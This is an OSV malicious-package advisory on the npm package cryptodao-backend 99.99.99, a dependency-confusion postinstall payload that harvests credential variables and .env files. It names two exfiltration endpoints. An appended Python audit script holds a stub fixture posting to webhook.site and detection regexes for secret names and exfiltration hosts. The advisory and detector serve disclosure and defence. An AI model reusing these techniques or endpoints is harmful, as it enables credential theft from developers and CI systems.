npm

cryptodao-backend @99.99.99

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-5966

Ecosystem

npm

Summary

package.json declares a postinstall script, "node recon.js", which runs automatically on npm install. recon.js (lines 30-46) scrapes a curated list of credential-bearing environment variables, including AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, NPM_TOKEN, CI_REGISTRY_PASSWORD, GITLAB_ACCESS_TOKEN, SSH_PRIVATE_KEY, PRIVATE_KEY, MNEMONIC, and DB_PASSWORD. It additionally enumerates and reads .env files at several paths outside the package's own scope (.env, ../.env, /app/.env, /home/gitlab-runner/.env, /root/.env), keeping lines that match /KEY|SECRET|TOKEN|PASS|PRIVATE|MNEMONIC/i. The collected JSON payload is POSTed (recon.js:84-87, 99-106) over HTTPS with rejectUnauthorized:false to two attacker-controlled endpoints: https://webhook.site/d6d18927-e513-4df7-b019-58bfc64fe0dd and https://enqoojbegdvxj.x.pipedream.net/. The package self-describes as the "CryptoDAO internal cryptodao-backend module" and is published at version 99.99.99, the canonical dependency-confusion shape, chosen to outrank a private internal package of the same name during npm resolution. A source comment in recon.js explicitly labels it a "Dependency Confusion Reconnaissance Payload."

Source: amazon-inspector (2dbe5f8614a264a8d3cdd2ecf8ecd2ad17292dbb5c5bcc25d0ae9d77eb8821df)
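As an added defender-side illustration (not part of the OSV record or of Amazon Inspector's analysis), the Python audit below flags the shape described in the summary in a package manifest and its install-hook script: an install lifecycle hook, an implausibly high version, and hook-script source that reads the listed credential variables or out-of-scope .env paths, disables TLS verification, or posts to the named exfiltration hosts. The package.json and recon.js contents are constructed samples that mirror the report's indicators, and the version threshold is an assumption.

```python
import json
import re

# Constructed sample inputs modelled on the indicators in the report; not the real package's files.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "cryptodao-backend",
    "version": "99.99.99",
    "scripts": {"postinstall": "node recon.js"},
})
SAMPLE_SCRIPTS = {"recon.js": """
const https = require('https');
const keys = ['AWS_SECRET_ACCESS_KEY', 'NPM_TOKEN', 'DB_PASSWORD'];
const out = { env: {}, files: {} };
for (const k of keys) out.env[k] = process.env[k];
for (const p of ['.env', '../.env', '/root/.env']) { /* read and filter lines */ }
https.request({ host: 'webhook.site', method: 'POST', rejectUnauthorized: false });
"""}

LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# Each rule is (label, regex applied to the hook script's source); names come from the report.
SCRIPT_RULES = [
    ("reads credential env vars", re.compile(
        r"AWS_SECRET_ACCESS_KEY|NPM_TOKEN|GITLAB_ACCESS_TOKEN|SSH_PRIVATE_KEY|MNEMONIC|DB_PASSWORD")),
    ("reads .env outside package", re.compile(r"['\"](\.\./|/[a-z-]+/|/root/)[^'\"]*\.env['\"]")),
    ("disables TLS verification", re.compile(r"rejectUnauthorized\s*:\s*false")),
    ("posts to exfil-style host", re.compile(r"webhook\.site|pipedream\.net")),
]
SUSPICIOUS_MAJOR = 90  # heuristic threshold (an assumption) catching 99.99.99-style versions


def audit_package(package_json: str, scripts: dict) -> list:
    """Return human-readable findings for a manifest plus the script files it ships."""
    pkg = json.loads(package_json)
    findings = []
    major = pkg.get("version", "0").split(".")[0]
    if major.isdigit() and int(major) >= SUSPICIOUS_MAJOR:
        findings.append(f"version {pkg['version']} looks chosen to win dependency resolution")
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue
        findings.append(f"{hook} hook runs: {cmd}")
        # Inspect every local JS file the lifecycle hook invokes.
        for target in re.findall(r"node\s+(\S+\.js)", cmd):
            src = scripts.get(target, "")
            findings += [f"{target}: {label}" for label, rx in SCRIPT_RULES if rx.search(src)]
    return findings


if __name__ == "__main__":
    for finding in audit_package(SAMPLE_PACKAGE_JSON, SAMPLE_SCRIPTS):
        print(finding)
```

A lock-file or registry check would run the same function over each newly resolved package before it is installed, since the postinstall hook fires during npm install itself.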
